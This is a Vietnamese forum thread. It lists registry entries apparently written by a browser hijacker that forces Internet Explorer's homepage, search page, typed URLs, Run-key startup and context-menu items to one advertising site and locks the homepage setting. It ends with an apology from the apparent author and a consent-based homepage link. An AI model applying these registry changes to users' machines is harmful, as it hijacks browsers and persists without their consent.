HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Www.ducpho.vnn.bz - Trang Nghe Nhac - Giai Tri - Tinh Yeu..."
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\\LinksFolderName","http://Www.ducpho.vnn.bz (c) 2006"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page", "http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\default_page_url", "http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url1","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url2","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url3","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\First Home Page","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\First Home Page","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Policies\Microsoft\Inte rnet Explorer\Control Panel\HomePage","1","REG_DWORD"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\IEXPLORE.EXE", "http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", ".:: http://Www.ducpho.vnn.bz- Trang Nhac - Giai Tri - Xem Phim - Cuoc Song... ::.."
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\\LinksFolderName","Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\default_page_url", "http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url1","http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url2","http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url3","http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\First Home Page","http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\First Home Page","http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Policies\Microsoft\Inte rnet Explorer\Control Panel\HomePage","1","REG_DWORD"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\IEXPLORE.EXE", "http://www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", ".:: www.ducpho.vnn.bz - Trang Nhac - Giai Tri - Xem Phim - Cuoc Song... ::.."
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\\LinksFolderName","www.ducpho.vnn.bz"
HKEY_CLASS_ROOT\*\shell\NGHE NHAC ONLINE\command\","C:\Program Files\Internet Explorer\IEXPLORE.EXE http://Www.ducpho.vnn.bz"
HKEY_CLASS_ROOT\*\shell\YM: Quoctuan_sh\command\","C:\Program Files\Internet Explorer\IEXPLORE.EXE http://Www.ducpho.vnn.bz"
HKEY_CLASS_ROOT\*\shell\DucPho.vnn.bz\command\","C:\Program Files\Internet Explorer\IEXPLORE.EXE http://Www.ducpho.vnn.bz"
HKEY_CLASS_ROOT\*\shell\Xem Phim Online\command\","C:\Program Files\Internet Explorer\IEXPLORE.EXE http://Www.ducpho.vnn.bz"
HKEY_CLASS_ROOT\Shell\shell\Girl Dep\command\","C:\Program Files\Internet Explorer\IEXPLORE.EXE http://Www.ducpho.vnn.bz"

hoang_philong
10/27/2006, 09:25 AM
hi khổ thân chưa anh bạn chỉ vì quảng cáo thôi đã làm phiền rồi dù sao thì cũng phải có câu xin lỗi anh em chứ Quốc Tuấn nhỉ và bà con đã dle xạch rác chưa vậy!

quoctuan
11/10/2006, 07:02 AM
Mình xin cảm ơn các bạn đã góp ý cho mình mình biết làm thế đúng là không phải lý.nên hôm nay mình cũng mong anh em đừng nên làm như mình và mình đưa lên đây một cách cài đặt HomePage rất ngắn gọn và cũng không ép buột ai nhưng cũng có thể giúp các bạn hỏi người dùng có cần cài HomePage cho máy mình không nếu không thì kích vào no.


<a onclick="this.style.behavior='url(#default#homepage)';this. setHomePage('http://ducpho.vnn.bz');" href="http://www.ducpho.vnn.bz">Trang Chủ</a>
các bạn hãy lấy dùng thử